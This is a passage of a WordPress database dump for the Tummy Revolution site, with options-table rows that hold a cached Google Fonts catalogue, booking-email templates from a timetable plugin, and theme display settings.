\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":10:{s:3:\"300\";s:80:\"http://fonts.gstatic.com/s/yrsa/v15/wlprgwnQFlxs_wD3CFSMYmFaaCjASNNV9rRPfrKu.ttf\";s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/yrsa/v15/wlprgwnQFlxs_wD3CFSMYmFaaCieSNNV9rRPfrKu.ttf\";s:3:\"500\";s:80:\"http://fonts.gstatic.com/s/yrsa/v15/wlprgwnQFlxs_wD3CFSMYmFaaCisSNNV9rRPfrKu.ttf\";s:3:\"600\";s:80:\"http://fonts.gstatic.com/s/yrsa/v15/wlprgwnQFlxs_wD3CFSMYmFaaChAT9NV9rRPfrKu.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/yrsa/v15/wlprgwnQFlxs_wD3CFSMYmFaaCh5T9NV9rRPfrKu.ttf\";s:9:\"300italic\";s:83:\"http://fonts.gstatic.com/s/yrsa/v15/wlptgwnQFlxs1QnF94zlCfv0bz1WC2UW_LBte6KuGEo.ttf\";s:6:\"italic\";s:83:\"http://fonts.gstatic.com/s/yrsa/v15/wlptgwnQFlxs1QnF94zlCfv0bz1WCzsW_LBte6KuGEo.ttf\";s:9:\"500italic\";s:83:\"http://fonts.gstatic.com/s/yrsa/v15/wlptgwnQFlxs1QnF94zlCfv0bz1WCwkW_LBte6KuGEo.ttf\";s:9:\"600italic\";s:83:\"http://fonts.gstatic.com/s/yrsa/v15/wlptgwnQFlxs1QnF94zlCfv0bz1WC-UR_LBte6KuGEo.ttf\";s:9:\"700italic\";s:83:\"http://fonts.gstatic.com/s/yrsa/v15/wlptgwnQFlxs1QnF94zlCfv0bz1WC9wR_LBte6KuGEo.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1430;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Yuji Boku\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:73:\"http://fonts.gstatic.com/s/yujiboku/v5/P5sAzZybeNzXsA9xj1Fkjb2r2dgvJA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1431;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Yuji Mai\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/yujimai/v5/ZgNQjPxdJ7DEHrS0gC38hmHmNpCO.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1432;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Yuji Syuku\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/yujisyuku/v5/BngNUXdTV3vO6Lw5ApOPqPfgwqiA-Rk.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1433;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Yusei Magic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"japanese\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/yuseimagic/v11/yYLt0hbAyuCmoo5wlhPkpjHR-tdfcIT_.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1434;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"ZCOOL KuaiLe\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:18:\"chinese-simplified\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/zcoolkuaile/v17/tssqApdaRQokwFjFJjvM6h2WpozzoXhC2g.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1435;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"ZCOOL QingKe HuangYou\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:18:\"chinese-simplified\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:101:\"http://fonts.gstatic.com/s/zcoolqingkehuangyou/v13/2Eb5L_R5IXJEWhD3AOhSvFC554MOOahI4mRIi_28c8bHWA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1436;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"ZCOOL XiaoWei\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:18:\"chinese-simplified\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/zcoolxiaowei/v10/i7dMIFFrTRywPpUVX9_RJyM1YFKQHwyVd3U.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1437;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Zen Antique\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:5:\"greek\";i:2;s:8:\"japanese\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/zenantique/v10/AYCPpXPnd91Ma_Zf-Ri2JXJq7PKP5Z_G.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1438;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Zen Antique Soft\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:5:\"greek\";i:2;s:8:\"japanese\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/zenantiquesoft/v10/DtV4JwqzSL1q_KwnEWMc_3xfgW6ihwBmkui5HNg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1439;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Zen Dots\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/zendots/v10/XRXX3ICfm00IGoesQeaETM_FcCIG.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1440;O:8:\"stdClass\":8:{s:6:\"family\";s:23:\"Zen Kaku Gothic Antique\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"900\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:108:\"http://fonts.gstatic.com/s/zenkakugothicantique/v11/6qLVKYkHvh-nlUpKPAdoVFBtfxDzIn1eCzpB22cM9TarWJtyZyGU.ttf\";s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/zenkakugothicantique/v11/6qLQKYkHvh-nlUpKPAdoVFBtfxDzIn1eCzpB21-g3RKjc4d7.ttf\";s:3:\"500\";s:108:\"http://fonts.gstatic.com/s/zenkakugothicantique/v11/6qLVKYkHvh-nlUpKPAdoVFBtfxDzIn1eCzpB22dU9DarWJtyZyGU.ttf\";s:3:\"700\";s:108:\"http://fonts.gstatic.com/s/zenkakugothicantique/v11/6qLVKYkHvh-nlUpKPAdoVFBtfxDzIn1eCzpB22cc8jarWJtyZyGU.ttf\";s:3:\"900\";s:108:\"http://fonts.gstatic.com/s/zenkakugothicantique/v11/6qLVKYkHvh-nlUpKPAdoVFBtfxDzIn1eCzpB22ck8DarWJtyZyGU.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1441;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Zen Kaku Gothic New\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"900\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:99:\"http://fonts.gstatic.com/s/zenkakugothicnew/v11/gNMVW2drQpDw0GjzrVNFf_valaDBcznOqpdKaWTSTGlMyd8.ttf\";s:7:\"regular\";s:95:\"http://fonts.gstatic.com/s/zenkakugothicnew/v11/gNMYW2drQpDw0GjzrVNFf_valaDBcznOkjtiTWz5UGA.ttf\";s:3:\"500\";s:99:\"http://fonts.gstatic.com/s/zenkakugothicnew/v11/gNMVW2drQpDw0GjzrVNFf_valaDBcznOqs9LaWTSTGlMyd8.ttf\";s:3:\"700\";s:99:\"http://fonts.gstatic.com/s/zenkakugothicnew/v11/gNMVW2drQpDw0GjzrVNFf_valaDBcznOqodNaWTSTGlMyd8.ttf\";s:3:\"900\";s:99:\"http://fonts.gstatic.com/s/zenkakugothicnew/v11/gNMVW2drQpDw0GjzrVNFf_valaDBcznOqr9PaWTSTGlMyd8.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1442;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Zen Kurenaido\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:5:\"greek\";i:2;s:8:\"japanese\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/zenkurenaido/v10/3XFsEr0515BK2u6UUptu_gWJZfz22PRLd0U.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1443;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Zen Loop\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/zenloop/v7/h0GrssK16UsnJwHsEK9zqwzX5vOG.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/zenloop/v7/h0GtssK16UsnJwHsEJ9xoQj14-OGJ0w.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1444;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Zen Maru Gothic\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"900\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:5:\"greek\";i:2;s:8:\"japanese\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:91:\"http://fonts.gstatic.com/s/zenmarugothic/v10/o-0XIpIxzW5b-RxT-6A8jWAtCp-cQWpCPJqa_ajlvw.ttf\";s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/zenmarugothic/v10/o-0SIpIxzW5b-RxT-6A8jWAtCp-k7UJmNLGG9A.ttf\";s:3:\"500\";s:91:\"http://fonts.gstatic.com/s/zenmarugothic/v10/o-0XIpIxzW5b-RxT-6A8jWAtCp-cGWtCPJqa_ajlvw.ttf\";s:3:\"700\";s:91:\"http://fonts.gstatic.com/s/zenmarugothic/v10/o-0XIpIxzW5b-RxT-6A8jWAtCp-cUW1CPJqa_ajlvw.ttf\";s:3:\"900\";s:91:\"http://fonts.gstatic.com/s/zenmarugothic/v10/o-0XIpIxzW5b-RxT-6A8jWAtCp-caW9CPJqa_ajlvw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1445;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Zen Old Mincho\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:3:\"700\";i:2;s:3:\"900\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:5:\"greek\";i:2;s:8:\"japanese\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/zenoldmincho/v9/tss0ApVaYytLwxTqcxfMyBveyYb3g31S2s8p.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/zenoldmincho/v9/tss3ApVaYytLwxTqcxfMyBveyb5LrFla8dMgPgBu.ttf\";s:3:\"900\";s:87:\"http://fonts.gstatic.com/s/zenoldmincho/v9/tss3ApVaYytLwxTqcxfMyBveyb5zrlla8dMgPgBu.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1446;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Zen Tokyo Zoo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/zentokyozoo/v7/NGSyv5ffC0J_BK6aFNtr6sRv8a1uRWe9amg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1447;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Zeyada\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/zeyada/v15/11hAGpPTxVPUbgZDNGatWKaZ3g.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1448;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Zhi Mang Xing\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:18:\"chinese-simplified\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/zhimangxing/v17/f0Xw0ey79sErYFtWQ9a2rq-g0actfektIJ0.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1449;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Zilla Slab\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":10:{s:3:\"300\";s:80:\"http://fonts.gstatic.com/s/zillaslab/v11/dFa5ZfeM_74wlPZtksIFYpEY2HSjWlhzbaw.ttf\";s:9:\"300italic\";s:83:\"http://fonts.gstatic.com/s/zillaslab/v11/dFanZfeM_74wlPZtksIFaj8CVHapXnp2fazkfg.ttf\";s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/zillaslab/v11/dFa6ZfeM_74wlPZtksIFWj0w_HyIRlE.ttf\";s:6:\"italic\";s:79:\"http://fonts.gstatic.com/s/zillaslab/v11/dFa4ZfeM_74wlPZtksIFaj86-F6NVlFqdA.ttf\";s:3:\"500\";s:80:\"http://fonts.gstatic.com/s/zillaslab/v11/dFa5ZfeM_74wlPZtksIFYskZ2HSjWlhzbaw.ttf\";s:9:\"500italic\";s:83:\"http://fonts.gstatic.com/s/zillaslab/v11/dFanZfeM_74wlPZtksIFaj8CDHepXnp2fazkfg.ttf\";s:3:\"600\";s:80:\"http://fonts.gstatic.com/s/zillaslab/v11/dFa5ZfeM_74wlPZtksIFYuUe2HSjWlhzbaw.ttf\";s:9:\"600italic\";s:83:\"http://fonts.gstatic.com/s/zillaslab/v11/dFanZfeM_74wlPZtksIFaj8CIHCpXnp2fazkfg.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/zillaslab/v11/dFa5ZfeM_74wlPZtksIFYoEf2HSjWlhzbaw.ttf\";s:9:\"700italic\";s:83:\"http://fonts.gstatic.com/s/zillaslab/v11/dFanZfeM_74wlPZtksIFaj8CRHGpXnp2fazkfg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1450;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Zilla Slab Highlight\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/zillaslabhighlight/v17/gNMbW2BrTpK8-inLtBJgMMfbm6uNVDvRxhtIY2DwSXlM.ttf\";s:3:\"700\";s:102:\"http://fonts.gstatic.com/s/zillaslabhighlight/v17/gNMUW2BrTpK8-inLtBJgMMfbm6uNVDvRxiP0TET4YmVF0Mb6.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}}s:11:\"last_update\";i:1692113899;}','yes'); INSERT INTO `wpvt_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (348,'timetable_contact_form_options','a:12:{s:10:\"admin_name\";s:27:\"admin@tummyrevolution.co.uk\";s:11:\"admin_email\";s:27:\"admin@tummyrevolution.co.uk\";s:10:\"mail_debug\";s:3:\"not\";s:9:\"smtp_host\";s:0:\"\";s:13:\"smtp_username\";s:0:\"\";s:13:\"smtp_password\";s:0:\"\";s:9:\"smtp_port\";s:0:\"\";s:11:\"smtp_secure\";s:0:\"\";s:20:\"email_subject_client\";s:44:\"You have been booked for event {event_title}\";s:15:\"template_client\";s:602:\"\r\n\r\n\r\n\r\n
Thank you for using our services.
\r\n
Booking details
\r\n
User: {user_name}
\r\n
Mail: {user_email}
\r\n
Date: {booking_datetime}
\r\n
Event details
\r\n
Event: {event_title}
\r\n
Day: {column_title}
\r\n
Time: {event_start} - {event_end}
\r\n
Description 1: {event_description_1}
\r\n
Description 2: {event_description_2}
\r\n
Slots number: {slots_number}
\r\n
{cancel_booking}
\r\n\r\n\";s:19:\"email_subject_admin\";s:36:\"New booking for event: {event_title}\";s:14:\"template_admin\";s:549:\"\r\n\r\n\r\n\r\n
New client
\r\n
Booking details
\r\n
User: {user_name}
\r\n
Mail: {user_email}
\r\n
Date: {booking_datetime}
\r\n
Event details
\r\n
Event: {event_title}
\r\n
Day: {column_title}
\r\n
Time: {event_start} - {event_end}
\r\n
Description 1: {event_description_1}
\r\n
Description 2: {event_description_2}
\r\n
Slots number: {slots_number}
\r\n\r\n\";}','yes'),(349,'timetable_google_calendar_options','a:2:{s:11:\"calendar_id\";s:0:\"\";s:17:\"calendar_settings\";s:0:\"\";}','yes'),(352,'vc_version','6.1','yes'),(354,'woocommerce_admin_last_orders_milestone','0','yes'),(355,'woocommerce_onboarding_profile','a:1:{s:9:\"completed\";b:1;}','yes'),(357,'envato_market_state','activated','yes'),(359,'qodef_options_succulents','a:761:{s:12:\"google_fonts\";s:2:\"-1\";s:23:\"additional_google_fonts\";s:2:\"no\";s:23:\"additional_google_font1\";s:2:\"-1\";s:23:\"additional_google_font2\";s:2:\"-1\";s:23:\"additional_google_font3\";s:2:\"-1\";s:23:\"additional_google_font4\";s:2:\"-1\";s:23:\"additional_google_font5\";s:2:\"-1\";s:18:\"google_font_weight\";a:1:{i:0;s:0:\"\";}s:18:\"google_font_subset\";a:1:{i:0;s:0:\"\";}s:11:\"first_color\";s:0:\"\";s:21:\"page_background_color\";s:0:\"\";s:15:\"selection_color\";s:0:\"\";s:5:\"boxed\";s:2:\"no\";s:28:\"page_background_color_in_box\";s:0:\"\";s:22:\"boxed_background_image\";s:0:\"\";s:30:\"boxed_pattern_background_image\";s:0:\"\";s:33:\"boxed_background_image_attachment\";s:0:\"\";s:8:\"paspartu\";s:2:\"no\";s:14:\"paspartu_color\";s:0:\"\";s:14:\"paspartu_width\";s:0:\"\";s:25:\"paspartu_responsive_width\";s:0:\"\";s:20:\"disable_top_paspartu\";s:2:\"no\";s:21:\"initial_content_width\";s:15:\"qodef-grid-1100\";s:21:\"preload_pattern_image\";s:0:\"\";s:18:\"page_smooth_scroll\";s:2:\"no\";s:23:\"smooth_page_transitions\";s:2:\"no\";s:25:\"page_transition_preloader\";s:2:\"no\";s:20:\"smooth_pt_bgnd_color\";s:0:\"\";s:22:\"smooth_pt_spinner_type\";s:0:\"\";s:29:\"qodef_smooth_pt_spinner_color\";s:0:\"\";s:23:\"page_transition_fadeout\";s:2:\"no\";s:16:\"show_back_button\";s:3:\"yes\";s:14:\"responsiveness\";s:3:\"yes\";s:9:\"custom_js\";s:0:\"\";s:19:\"google_maps_api_key\";s:0:\"\";s:9:\"hide_logo\";s:2:\"no\";s:10:\"logo_image\";s:73:\"http://tummyrevolution.com/wp-content/uploads/2020/04/Logo-New-TR-web.jpg\";s:15:\"logo_image_dark\";s:79:\"http://tummyrevolution.com/wp-content/uploads/2020/04/small-Logo-New-TR-web.jpg\";s:16:\"logo_image_light\";s:79:\"http://tummyrevolution.com/wp-content/uploads/2020/04/small-Logo-New-TR-web.jpg\";s:17:\"logo_image_sticky\";s:79:\"http://tummyrevolution.com/wp-content/uploads/2020/04/small-Logo-New-TR-web.jpg\";s:17:\"logo_image_mobile\";s:79:\"http://tummyrevolution.com/wp-content/uploads/2020/04/small-Logo-New-TR-web.jpg\";s:8:\"h1_color\";s:0:\"\";s:12:\"h1_font_size\";s:0:\"\";s:14:\"h1_line_height\";s:0:\"\";s:17:\"h1_text_transform\";s:0:\"\";s:15:\"h1_google_fonts\";s:2:\"-1\";s:13:\"h1_font_style\";s:0:\"\";s:14:\"h1_font_weight\";s:0:\"\";s:17:\"h1_letter_spacing\";s:0:\"\";s:13:\"h1_margin_top\";s:0:\"\";s:16:\"h1_margin_bottom\";s:0:\"\";s:8:\"h2_color\";s:0:\"\";s:12:\"h2_font_size\";s:0:\"\";s:14:\"h2_line_height\";s:0:\"\";s:17:\"h2_text_transform\";s:0:\"\";s:15:\"h2_google_fonts\";s:2:\"-1\";s:13:\"h2_font_style\";s:0:\"\";s:14:\"h2_font_weight\";s:0:\"\";s:17:\"h2_letter_spacing\";s:0:\"\";s:13:\"h2_margin_top\";s:0:\"\";s:16:\"h2_margin_bottom\";s:0:\"\";s:8:\"h3_color\";s:0:\"\";s:12:\"h3_font_size\";s:0:\"\";s:14:\"h3_line_height\";s:0:\"\";s:17:\"h3_text_transform\";s:0:\"\";s:15:\"h3_google_fonts\";s:2:\"-1\";s:13:\"h3_font_style\";s:0:\"\";s:14:\"h3_font_weight\";s:0:\"\";s:17:\"h3_letter_spacing\";s:0:\"\";s:13:\"h3_margin_top\";s:0:\"\";s:16:\"h3_margin_bottom\";s:0:\"\";s:8:\"h4_color\";s:0:\"\";s:12:\"h4_font_size\";s:0:\"\";s:14:\"h4_line_height\";s:0:\"\";s:17:\"h4_text_transform\";s:0:\"\";s:15:\"h4_google_fonts\";s:2:\"-1\";s:13:\"h4_font_style\";s:0:\"\";s:14:\"h4_font_weight\";s:0:\"\";s:17:\"h4_letter_spacing\";s:0:\"\";s:13:\"h4_margin_top\";s:0:\"\";s:16:\"h4_margin_bottom\";s:0:\"\";s:8:\"h5_color\";s:0:\"\";s:12:\"h5_font_size\";s:0:\"\";s:14:\"h5_line_height\";s:0:\"\";s:17:\"h5_text_transform\";s:0:\"\";s:15:\"h5_google_fonts\";s:2:\"-1\";s:13:\"h5_font_style\";s:0:\"\";s:14:\"h5_font_weight\";s:0:\"\";s:17:\"h5_letter_spacing\";s:0:\"\";s:13:\"h5_margin_top\";s:0:\"\";s:16:\"h5_margin_bottom\";s:0:\"\";s:8:\"h6_color\";s:0:\"\";s:12:\"h6_font_size\";s:0:\"\";s:14:\"h6_line_height\";s:0:\"\";s:17:\"h6_text_transform\";s:0:\"\";s:15:\"h6_google_fonts\";s:2:\"-1\";s:13:\"h6_font_style\";s:0:\"\";s:14:\"h6_font_weight\";s:0:\"\";s:17:\"h6_letter_spacing\";s:0:\"\";s:13:\"h6_margin_top\";s:0:\"\";s:16:\"h6_margin_bottom\";s:0:\"\";s:25:\"h1_responsive_font_size_3\";s:0:\"\";s:27:\"h1_responsive_line_height_3\";s:0:\"\";s:30:\"h1_responsive_letter_spacing_3\";s:0:\"\";s:25:\"h2_responsive_font_size_3\";s:0:\"\";s:27:\"h2_responsive_line_height_3\";s:0:\"\";s:30:\"h2_responsive_letter_spacing_3\";s:0:\"\";s:25:\"h3_responsive_font_size_3\";s:0:\"\";s:27:\"h3_responsive_line_height_3\";s:0:\"\";s:30:\"h3_responsive_letter_spacing_3\";s:0:\"\";s:25:\"h4_responsive_font_size_3\";s:0:\"\";s:27:\"h4_responsive_line_height_3\";s:0:\"\";s:30:\"h4_responsive_letter_spacing_3\";s:0:\"\";s:25:\"h5_responsive_font_size_3\";s:0:\"\";s:27:\"h5_responsive_line_height_3\";s:0:\"\";s:30:\"h5_responsive_letter_spacing_3\";s:0:\"\";s:25:\"h6_responsive_font_size_3\";s:0:\"\";s:27:\"h6_responsive_line_height_3\";s:0:\"\";s:30:\"h6_responsive_letter_spacing_3\";s:0:\"\";s:23:\"h1_responsive_font_size\";s:0:\"\";s:25:\"h1_responsive_line_height\";s:0:\"\";s:28:\"h1_responsive_letter_spacing\";s:0:\"\";s:23:\"h2_responsive_font_size\";s:0:\"\";s:25:\"h2_responsive_line_height\";s:0:\"\";s:28:\"h2_responsive_letter_spacing\";s:0:\"\";s:23:\"h3_responsive_font_size\";s:0:\"\";s:25:\"h3_responsive_line_height\";s:0:\"\";s:28:\"h3_responsive_letter_spacing\";s:0:\"\";s:23:\"